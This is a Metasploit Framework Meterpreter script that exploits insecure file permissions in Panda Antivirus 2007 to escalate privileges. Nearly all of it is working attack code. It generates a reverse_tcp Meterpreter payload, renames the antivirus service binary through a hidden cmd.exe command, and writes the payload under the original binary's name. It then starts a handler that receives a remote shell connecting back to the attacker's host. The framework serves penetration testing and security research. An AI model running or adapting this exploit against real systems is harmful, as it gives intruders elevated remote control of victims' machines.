metasploit-framework/scripts/meterpreter/panda_2007_pavsrv51.rb

102 lines
3.0 KiB
Ruby
Raw Normal View History

# $Id: panda_2007_pavsrv51.rb 8734 2010-03-07 22:49:08Z mc $
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
##
# Panda Antivirus 2007 Local Privilege Escalation
# This module exploits a privilege escalation vulnerability in
# Panda Antivirus 2007. Due to insecure permission issues, a
# local attacker can gain elevated privileges.
#
# This script has only been tested against Panda Antivirus 2007.
#
# BID - 4257
# mc[@]metasploit.com
##
#
# Options
#
opts = Rex::Parser::Arguments.new(
"-h" => [ false, "This help menu"],
"-r" => [ true, "The IP of the system running Metasploit listening for the connect back"],
"-p" => [ true, "The port on the remote host where Metasploit is listening"]
)
#
# Default parameters
#
rhost = Rex::Socket.source_address("1.2.3.4")
rport = 4444
#
# Option parsing
#
opts.parse(args) do |opt, idx, val|
case opt
when "-h"
print_status("Panda Antivirus 2007 privilege escalation.")
print_line(opts.usage)
raise Rex::Script::Completed
when "-r"
rhost = val
when "-p"
rport = val.to_i
end
end
client.sys.process.get_processes().each do |m|
if ( m['name'] =~ /PAVSRV51\.EXE/ )
print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
# Build out the exe payload.
pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
pay.datastore['LHOST'] = rhost
pay.datastore['LPORT'] = rport
raw = pay.generate
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
# Change to our working directory.
workingdir = client.fs.file.expand_path("%ProgramFiles%")
client.fs.dir.chdir(workingdir + "\\Panda Software\\Panda Antivirus 2007\\")
# Create a backup of the original exe.
print_status("Creating a copy of PAVSRV51 (PAVSRV51_back.EXE)...")
client.sys.process.execute("cmd.exe /c rename PAVSRV51.EXE PAVSRV51_back.EXE", nil, {'Hidden' => 'true'})
# Place our newly created exe with the orginal binary name.
tempdir = client.fs.file.expand_path("%ProgramFiles%")
tempexe = tempdir + "\\Panda Software\\Panda Antivirus 2007\\" + "PAVSRV51.EXE"
print_status("Sending EXE payload '#{tempexe}'.")
fd = client.fs.file.new(tempexe, "wb")
fd.write(exe)
fd.close
print_status("Done, now just wait for the callback...")
# Our handler to recieve the callback.
handler = client.framework.exploits.create("multi/handler")
handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp"
handler.datastore['LHOST'] = rhost
handler.datastore['LPORT'] = rport
# Keep our shell stable.
handler.datastore['InitialAutoRunScript'] = "migrate -f"
handler.datastore['ExitOnSession'] = false
handler.exploit_simple(
'Payload' => handler.datastore['PAYLOAD'],
'RunAsJob' => true
)
end
end